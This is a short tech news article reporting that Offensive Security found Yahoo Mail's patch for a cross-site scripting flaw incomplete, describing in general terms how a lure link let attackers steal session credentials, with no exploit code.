Yahoo Mail Still Contains The XSS Vulnerability

It was recently revealed that Yahoo Mail contained a critical XSS vulnerability that allowed a hacker to send a luring link to the victim so that when the victim clicked it, sufficient account credentials were sent to the hacker to help him overtake the victim’s account. Yahoo said it had since patched the vulnerability but that has proved wrong now.


Yahoo

The fresh proof-of-concept hack of the Yahoo Mail comes from Offesive Security, a security research firm. The firm claims that Yahoo only tackled a given method of exploiting the XSS vulnerability in Yahoo Mail. A hacker can gain access to a victim’s account all the same by switching to a different cross-site scripting method.

According to Jim O’Gorman of Offensive Security, “In this case, Yahoo has been provided the proof-of-concept by Shahin. They thought they had it corrected and went around releasing statements to that fact. However, and this is actually common, they corrected the specific method of exploitation that was used in the initial proof-of-concept, but did not correct the underlying flaw. Because of this, it’s possible to bypass Yahoo’s new protections with only some slight modifications.”

To substantiate its claim, the firm has released a demo video which shows how a hacker is able to gain access to a victim’s Yahoo Mail account. He does so by sending a malicious link to the victim. The victim clicks the link and it opens Yahoo’s home page, leaving the victim unaware of what has happened.

What actually happens is that the click event gathers victim’s account credentials and sends them to the hacker. The hacker tweaks them and adds them to his browser cookies which lets him directly access the victim’s account. The video below clearly shows that Yahoo still needs to do a lot to make the security of its Mail accounts fool-proof.

Source: Offensive Security

Courtesy: All Things D

[ttjad keyword=”chrome-laptop”]

Salman

Salman Latif is a software engineer with a specific interest in social media, big data and real-world solutions using the two.Other than that, he is a bit of a gypsy. He also writes in his own blog. You can find him on Google+ and Twitter .

Leave a Reply